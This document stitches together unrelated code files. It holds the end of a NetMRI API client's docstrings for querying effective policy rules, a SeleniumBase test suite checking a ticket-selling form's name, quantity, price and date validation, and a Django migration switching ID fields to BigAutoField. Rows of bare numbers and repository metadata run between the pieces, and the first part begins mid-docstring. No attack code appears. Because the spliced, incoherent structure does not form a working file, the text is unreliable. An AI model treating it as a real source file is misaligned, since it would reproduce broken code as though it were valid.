:param val_f_PolicyRuleName: If op_PolicyRuleName is specified, the field named in this input will be compared to the value in PolicyRuleName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleName must be specified if op_PolicyRuleName is specified.
:type val_f_PolicyRuleName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleName: If op_PolicyRuleName is specified, this value will be compared to the value in PolicyRuleName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleName must be specified if op_PolicyRuleName is specified.
:type val_c_PolicyRuleName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleReadOnlyInd: The operator to apply to the field PolicyRuleReadOnlyInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleReadOnlyInd: A flag indicating whether this is a read-only policy rule. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleReadOnlyInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleReadOnlyInd: If op_PolicyRuleReadOnlyInd is specified, the field named in this input will be compared to the value in PolicyRuleReadOnlyInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleReadOnlyInd must be specified if op_PolicyRuleReadOnlyInd is specified.
:type val_f_PolicyRuleReadOnlyInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleReadOnlyInd: If op_PolicyRuleReadOnlyInd is specified, this value will be compared to the value in PolicyRuleReadOnlyInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleReadOnlyInd must be specified if op_PolicyRuleReadOnlyInd is specified.
:type val_c_PolicyRuleReadOnlyInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleRemediation: The operator to apply to the field PolicyRuleRemediation. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleRemediation: The textual remediation description associated with the rule. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleRemediation: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleRemediation: If op_PolicyRuleRemediation is specified, the field named in this input will be compared to the value in PolicyRuleRemediation using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleRemediation must be specified if op_PolicyRuleRemediation is specified.
:type val_f_PolicyRuleRemediation: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleRemediation: If op_PolicyRuleRemediation is specified, this value will be compared to the value in PolicyRuleRemediation using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleRemediation must be specified if op_PolicyRuleRemediation is specified.
:type val_c_PolicyRuleRemediation: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleRuleLogic: The operator to apply to the field PolicyRuleRuleLogic. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleRuleLogic: The XML policy rule logic. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleRuleLogic: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleRuleLogic: If op_PolicyRuleRuleLogic is specified, the field named in this input will be compared to the value in PolicyRuleRuleLogic using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleRuleLogic must be specified if op_PolicyRuleRuleLogic is specified.
:type val_f_PolicyRuleRuleLogic: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleRuleLogic: If op_PolicyRuleRuleLogic is specified, this value will be compared to the value in PolicyRuleRuleLogic using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleRuleLogic must be specified if op_PolicyRuleRuleLogic is specified.
:type val_c_PolicyRuleRuleLogic: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleSetFilter: The operator to apply to the field PolicyRuleSetFilter. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleSetFilter: The XML SetFilter used to determine if this rule applies to a specific device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleSetFilter: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleSetFilter: If op_PolicyRuleSetFilter is specified, the field named in this input will be compared to the value in PolicyRuleSetFilter using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleSetFilter must be specified if op_PolicyRuleSetFilter is specified.
:type val_f_PolicyRuleSetFilter: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleSetFilter: If op_PolicyRuleSetFilter is specified, this value will be compared to the value in PolicyRuleSetFilter using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleSetFilter must be specified if op_PolicyRuleSetFilter is specified.
:type val_c_PolicyRuleSetFilter: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleSeverity: The operator to apply to the field PolicyRuleSeverity. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleSeverity: The severity level (info, warning, or error) for a violation of this rule. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleSeverity: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleSeverity: If op_PolicyRuleSeverity is specified, the field named in this input will be compared to the value in PolicyRuleSeverity using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleSeverity must be specified if op_PolicyRuleSeverity is specified.
:type val_f_PolicyRuleSeverity: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleSeverity: If op_PolicyRuleSeverity is specified, this value will be compared to the value in PolicyRuleSeverity using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleSeverity must be specified if op_PolicyRuleSeverity is specified.
:type val_c_PolicyRuleSeverity: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleShortName: The operator to apply to the field PolicyRuleShortName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleShortName: The policy rule short name, used on the policy status display. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleShortName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleShortName: If op_PolicyRuleShortName is specified, the field named in this input will be compared to the value in PolicyRuleShortName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleShortName must be specified if op_PolicyRuleShortName is specified.
:type val_f_PolicyRuleShortName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleShortName: If op_PolicyRuleShortName is specified, this value will be compared to the value in PolicyRuleShortName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleShortName must be specified if op_PolicyRuleShortName is specified.
:type val_c_PolicyRuleShortName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleStartTime: The operator to apply to the field PolicyRuleStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleStartTime: The starting effective time of this record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleStartTime: If op_PolicyRuleStartTime is specified, the field named in this input will be compared to the value in PolicyRuleStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleStartTime must be specified if op_PolicyRuleStartTime is specified.
:type val_f_PolicyRuleStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleStartTime: If op_PolicyRuleStartTime is specified, this value will be compared to the value in PolicyRuleStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleStartTime must be specified if op_PolicyRuleStartTime is specified.
:type val_c_PolicyRuleStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleTimestamp: The operator to apply to the field PolicyRuleTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleTimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleTimestamp: If op_PolicyRuleTimestamp is specified, the field named in this input will be compared to the value in PolicyRuleTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleTimestamp must be specified if op_PolicyRuleTimestamp is specified.
:type val_f_PolicyRuleTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleTimestamp: If op_PolicyRuleTimestamp is specified, this value will be compared to the value in PolicyRuleTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleTimestamp must be specified if op_PolicyRuleTimestamp is specified.
:type val_c_PolicyRuleTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleUpdatedAt: The operator to apply to the field PolicyRuleUpdatedAt. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleUpdatedAt: The date and time the policy rule was last updated in NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleUpdatedAt: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleUpdatedAt: If op_PolicyRuleUpdatedAt is specified, the field named in this input will be compared to the value in PolicyRuleUpdatedAt using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleUpdatedAt must be specified if op_PolicyRuleUpdatedAt is specified.
:type val_f_PolicyRuleUpdatedAt: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleUpdatedAt: If op_PolicyRuleUpdatedAt is specified, this value will be compared to the value in PolicyRuleUpdatedAt using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleUpdatedAt must be specified if op_PolicyRuleUpdatedAt is specified.
:type val_c_PolicyRuleUpdatedAt: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the effective policy rules as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of effective policy rule methods. The listed methods will be called on each effective policy rule returned and included in the output. Available methods are: policy_rule_set_filter_text, policy_rule_rule_logic_text, devices, data_source.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` PolicyRuleID
:param sort: The data field(s) to use for sorting the output. Default is PolicyRuleID. Valid values are DataSourceID, PolicyRuleID, PolicyRuleStartTime, PolicyRuleEndTime, PolicyRuleChangedCols, PolicyRuleTimestamp, PolicyRuleFirstSeenTime, PolicyRuleName, PolicyRuleDescription, PolicyRuleAuthor, PolicyRuleSetFilter, PolicyRuleRuleLogic, PolicyRuleSeverity, PolicyRuleActionAfterExec, PolicyRuleCreatedAt, PolicyRuleUpdatedAt, PolicyRuleRemediation, PolicyRuleShortName, PolicyRuleReadOnlyInd.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each EffectivePolicyRule. Valid values are DataSourceID, PolicyRuleID, PolicyRuleStartTime, PolicyRuleEndTime, PolicyRuleChangedCols, PolicyRuleTimestamp, PolicyRuleFirstSeenTime, PolicyRuleName, PolicyRuleDescription, PolicyRuleAuthor, PolicyRuleSetFilter, PolicyRuleRuleLogic, PolicyRuleSeverity, PolicyRuleActionAfterExec, PolicyRuleCreatedAt, PolicyRuleUpdatedAt, PolicyRuleRemediation, PolicyRuleShortName, PolicyRuleReadOnlyInd. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return effective_policy_rules: An array of the EffectivePolicyRule objects that match the specified input criteria.
:rtype effective_policy_rules: Array of EffectivePolicyRule
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def data_source(self, **kwargs):
"""The collector NetMRI that collected this data record.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param PolicyRuleID: The internal NetMRI identifier for this effective policy rule.
:type PolicyRuleID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The collector NetMRI that collected this data record.
:rtype : DataSource
"""
return self.api_request(self._get_method_fullname("data_source"), kwargs)
def devices(self, **kwargs):
"""The devices against which this rule was evaluated.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param PolicyRuleID: The internal NetMRI identifier for this effective policy rule.
:type PolicyRuleID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The devices against which this rule was evaluated.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("devices"), kwargs)
def policy_rule_set_filter_text(self, **kwargs):
"""Returns a human-readable text version of the policy rule set filter.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param PolicyRuleID: The internal NetMRI identifier for this effective policy rule.
:type PolicyRuleID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Returns a human-readable text version of the policy rule set filter.
:rtype : String
"""
return self.api_request(self._get_method_fullname("policy_rule_set_filter_text"), kwargs)
def policy_rule_rule_logic_text(self, **kwargs):
"""Returns a human readable text version of the policy rule logic.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param PolicyRuleID: The internal NetMRI identifier for this effective policy rule.
:type PolicyRuleID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Returns a human readable text version of the policy rule logic.
:rtype : String
"""
return self.api_request(self._get_method_fullname("policy_rule_rule_logic_text"), kwargs)
| 54.75019
| 811
| 0.627632
| 8,282
| 72,106
| 5.40739
| 0.039483
| 0.066988
| 0.043542
| 0.071275
| 0.95121
| 0.94862
| 0.912714
| 0.900835
| 0.891524
| 0.889961
| 0
| 0.004025
| 0.293596
| 72,106
| 1,317
| 812
| 54.75019
| 0.875196
| 0.825673
| 0
| 0
| 0
| 0
| 0.079243
| 0.053296
| 0
| 0
| 0
| 0
| 0
| 1
| 0.421053
| false
| 0
| 0.052632
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
156a6174b3113dfae726a220c11c55dfb25687ba
| 10,575
|
py
|
Python
|
qa327_test/frontend/test_sell.py
|
llim1/SeetGeek-CMPE327
|
6d49b9c6bd9e67dd747584a7b2109d69ae4c6c96
|
[
"MIT"
] | null | null | null |
qa327_test/frontend/test_sell.py
|
llim1/SeetGeek-CMPE327
|
6d49b9c6bd9e67dd747584a7b2109d69ae4c6c96
|
[
"MIT"
] | null | null | null |
qa327_test/frontend/test_sell.py
|
llim1/SeetGeek-CMPE327
|
6d49b9c6bd9e67dd747584a7b2109d69ae4c6c96
|
[
"MIT"
] | 1
|
2021-01-02T16:36:17.000Z
|
2021-01-02T16:36:17.000Z
|
import pytest
from seleniumbase import BaseCase
from qa327_test.conftest import base_url
from unittest.mock import patch
from qa327.models import db, User, Ticket
from werkzeug.security import generate_password_hash, check_password_hash
# Testing components
test_user = User(
email='testing@test.com',
name='Test',
password=generate_password_hash('Testing!'),
balance=5000
)
test_ticket = Ticket(
name='test ticket yo',
quantity='10',
price='10',
expiration_date=20201201
)
invalid_ticket_name1 = Ticket(
name='@testTicket',
quantity='10',
price='10',
expiration_date=20201201
)
invalid_ticket_name2 = Ticket(
name=' testTicket',
quantity='10',
price='10',
expiration_date=20201201
)
invalid_ticket_name3 = Ticket(
name='testTicket ',
quantity='10',
price='10',
expiration_date=20201201
)
invalid_ticket_name4 = Ticket(
name='testTicketxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx',
quantity='10',
price='10',
expiration_date=20201101
)
invalid_ticket_quantity1 = Ticket(
name='testTicket',
quantity='0',
price='10',
expiration_date=20201101
)
invalid_ticket_quantity2 = Ticket(
name='testTicket',
quantity='101',
price='10',
expiration_date=20201101
)
invalid_ticket_price2 = Ticket(
name='testTicket',
quantity='101',
price='10',
expiration_date=20201101
)
invalid_ticket_price2 = Ticket(
name='testTicket',
quantity='101',
price='10',
expiration_date=20201101
)
# Test case R4.1 - The name of the ticket has to be alphanumeric-only, and space
# allowed only if it is not the first or last character
class TestCase4_1(BaseCase):
# Test Case R4.1.1 - Non-alphanumeric
@patch('qa327.backend.get_user', return_value=test_user)
def testcase4_1_1(self, *_):
self.open(base_url + '/logout')
self.open(base_url + '/login')
self.type("#email","testing@test.com")
self.type("#password","Testing!")
self.click('input[type="submit"]')
self.get_element('#sell_form').click()
self.type("#name","@testTicket")
self.type("#quantity","10")
self.type("#price","10")
self.type("#expiration_date","20201201")
self.click('input[type="submit"]')
self.assert_text("Ticket Name must be alphanumeric")
# Test Case R4.1.2 - First character is a space
@patch('qa327.backend.get_user', return_value=test_user)
def testcase4_1_2(self, *_):
self.open(base_url + '/logout')
self.open(base_url + '/login')
self.type("#email","testing@test.com")
self.type("#password","Testing!")
self.click('input[type="submit"]')
self.get_element('#sell_form').click()
self.type("#name"," testTicket")
self.type("#quantity","10")
self.type("#price","10")
self.type("#expiration_date","20201201")
self.click('input[type="submit"]')
self.assert_text("Ticket Name must not include a space at the beginning")
# Test Case R4.1.3 - Last character is a space
@patch('qa327.backend.get_user', return_value=test_user)
def testcase4_1_3(self, *_):
self.open(base_url + '/logout')
self.open(base_url + '/login')
self.type("#email","testing@test.com")
self.type("#password","Testing!")
self.click('input[type="submit"]')
self.get_element('#sell_form').click()
self.type("#name","testTicket ")
self.type("#quantity","10")
self.type("#price","10")
self.type("#expiration_date","20201201")
self.click('input[type="submit"]')
self.assert_text("Ticket Name must not include a space at the end")
# Test case R4.2 - The name of the ticket is no longer than 60 characters
class TestCase4_2(BaseCase):
@patch('qa327.backend.get_user', return_value=test_user)
def testcase4_3(self, *_):
self.open(base_url + '/logout')
self.open(base_url + '/login')
self.type("#email","testing@test.com")
self.type("#password","Testing!")
self.click('input[type="submit"]')
self.get_element('#sell_form').click()
self.type("#name","testTicketxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx")
self.type("#quantity","10")
self.type("#price","10")
self.type("#expiration_date","20201201")
self.click('input[type="submit"]')
self.assert_text("The name of the ticket must be no longer than 60 characters")
# Test case R4.3 - The quantity of the tickets has to be more than 0, and less than or equal to 100
class TestCase4_3(BaseCase):
# Test Case R4.3.1 - 0 quantity
@patch('qa327.backend.get_user', return_value=test_user)
def testcase4_3_1(self, *_):
self.open(base_url + '/logout')
self.open(base_url + '/login')
self.type("#email","testing@test.com")
self.type("#password","Testing!")
self.click('input[type="submit"]')
self.get_element('#sell_form').click()
self.type("#name","testTicket")
self.type("#quantity","0")
self.type("#price","10")
self.type("#expiration_date","20201201")
self.click('input[type="submit"]')
self.assert_text("The quantity of the tickets has to be more than 0, and less than or equal to 100.")
# Test Case R4.3.2 - 101 quantity
@patch('qa327.backend.get_user', return_value=test_user)
def testcase4_3_2(self, *_):
self.open(base_url + '/logout')
self.open(base_url + '/login')
self.type("#email","testing@test.com")
self.type("#password","Testing!")
self.click('input[type="submit"]')
self.get_element('#sell_form').click()
self.type("#name","testTicket")
self.type("#quantity","101")
self.type("#price","10")
self.type("#expiration_date","20201201")
self.click('input[type="submit"]')
self.assert_text("The quantity of the tickets has to be more than 0, and less than or equal to 100.")
# Test case R4.4 - Price has to be of range [10, 100]
class TestCase4_4(BaseCase):
# Test Case R4.4.1 - Below 10 price
@patch('qa327.backend.get_user', return_value=test_user)
def testcase4_4_1(self, *_):
self.open(base_url + '/logout')
self.open(base_url + '/login')
self.type("#email","testing@test.com")
self.type("#password","Testing!")
self.click('input[type="submit"]')
self.get_element('#sell_form').click()
self.type("#name","testTicket")
self.type("#quantity","10")
self.type("#price","9")
self.type("#expiration_date","20201201")
self.click('input[type="submit"]')
self.assert_text("Ticket Price cannot be less than 10")
# Test Case R4.4.2 - Above 100 price
@patch('qa327.backend.get_user', return_value=test_user)
def testcase4_4_2(self, *_):
self.open(base_url + '/logout')
self.open(base_url + '/login')
self.type("#email","testing@test.com")
self.type("#password","Testing!")
self.click('input[type="submit"]')
self.get_element('#sell_form').click()
self.type("#name","testTicket")
self.type("#quantity","10")
self.type("#price","101")
self.type("#expiration_date","20201201")
self.click('input[type="submit"]')
self.assert_text("Ticket Price cannot be more than 100")
# Test case R4.5 - Date must be given in the format YYYYMMDD
class TestCase4_5(BaseCase):
# Test Case R4.5.1 - Includes non-numeric characters
@patch('qa327.backend.get_user', return_value=test_user)
def testcase4_5_1(self, *_):
self.open(base_url + '/logout')
self.open(base_url + '/login')
self.type("#email","testing@test.com")
self.type("#password","Testing!")
self.click('input[type="submit"]')
self.get_element('#sell_form').click()
self.type("#name", "testTicket")
self.type("#quantity", "50")
self.type("#price", "15")
self.type("#expiration_date", "20/11/01")
self.click('input[type="submit"]')
self.assert_text("Ticket Date must not include non-numeric characters")
# Test Case R4.5.2 - Does not include 8 characters
@patch('qa327.backend.get_user', return_value=test_user)
def testcase4_5_2(self, *_):
self.open(base_url + '/logout')
self.open(base_url + '/login')
self.type("#email","testing@test.com")
self.type("#password","Testing!")
self.click('input[type="submit"]')
self.get_element('#sell_form').click()
self.type("#name", "testTicket")
self.type("#quantity", "50")
self.type("#price", "15")
self.type("#expiration_date", "2020111")
self.click('input[type="submit"]')
self.assert_text("Ticket Date must be 8 characters long")
# Test case R4.6 - For any errors, redirect back to / and show an error message
class TestCase4_6(BaseCase):
# Test Case R4.6 - Redirects back to /
@patch('qa327.backend.get_user', return_value=test_user)
def testcase4_6(self, *_):
self.open(base_url + '/logout')
self.open(base_url + '/login')
self.type("#email","testing@test.com")
self.type("#password","Testing!")
self.click('input[type="submit"]')
self.get_element('#sell_form').click()
self.type("#name", "@testTicket")
self.type("#quantity", "10")
self.type("#price", "10")
self.type("#expiration_date", "20201101")
self.click('input[type="submit"]')
self.assert_element("#welcome-header")
self.assert_text("Ticket Name must be alphanumeric")
# Test case R4.7 - Add new ticket to user profile page
class TestCase4_7(BaseCase):
# Test Case R4.7 - Does not include 8 characters
@patch('qa327.backend.get_user', return_value=test_user)
def testcase4_6(self, *_):
self.open(base_url + '/logout')
self.open(base_url + '/login')
self.type("#email","testing@test.com")
self.type("#password","Testing!")
self.click('input[type="submit"]')
self.get_element('#sell_form').click()
self.type("#name", "testTicket123")
self.type("#quantity", "10")
self.type("#price", "10")
self.type("#expiration_date", "20221201")
self.click('input[type="submit"]')
self.open(base_url + '/')
self.assert_element("#tickets")
self.assert_text("Name: testTicket123","#tickets")
| 37.767857
| 109
| 0.62695
| 1,367
| 10,575
| 4.713972
| 0.111192
| 0.089385
| 0.046555
| 0.058194
| 0.786623
| 0.77126
| 0.765363
| 0.747052
| 0.747052
| 0.738982
| 0
| 0.052739
| 0.209267
| 10,575
| 280
| 110
| 37.767857
| 0.71789
| 0.095225
| 0
| 0.713115
| 0
| 0
| 0.319439
| 0.040427
| 0
| 0
| 0
| 0
| 0.057377
| 1
| 0.04918
| false
| 0.057377
| 0.02459
| 0
| 0.102459
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
1593dbef4d83cc578ed51a12725d810353f9e782
| 1,974
|
py
|
Python
|
virtual/lib/python3.8/site-packages/account/migrations/0006_auto_20210413_0847.py
|
nimowairimu/My-neighborhood
|
23e66f221a0bc864dcc12309d02079dbfce6123c
|
[
"MIT"
] | null | null | null |
virtual/lib/python3.8/site-packages/account/migrations/0006_auto_20210413_0847.py
|
nimowairimu/My-neighborhood
|
23e66f221a0bc864dcc12309d02079dbfce6123c
|
[
"MIT"
] | null | null | null |
virtual/lib/python3.8/site-packages/account/migrations/0006_auto_20210413_0847.py
|
nimowairimu/My-neighborhood
|
23e66f221a0bc864dcc12309d02079dbfce6123c
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2 on 2021-04-13 08:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('account', '0005_update_default_language'),
]
operations = [
migrations.AlterField(
model_name='account',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='accountdeletion',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='emailaddress',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='emailconfirmation',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='passwordexpiry',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='passwordhistory',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='signupcode',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='signupcoderesult',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| 36.555556
| 111
| 0.611449
| 196
| 1,974
| 5.979592
| 0.234694
| 0.081911
| 0.170648
| 0.197952
| 0.753413
| 0.753413
| 0.753413
| 0.753413
| 0.753413
| 0.753413
| 0
| 0.0125
| 0.270517
| 1,974
| 53
| 112
| 37.245283
| 0.801389
| 0.021783
| 0
| 0.680851
| 1
| 0
| 0.089684
| 0.014515
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.042553
| 0.021277
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
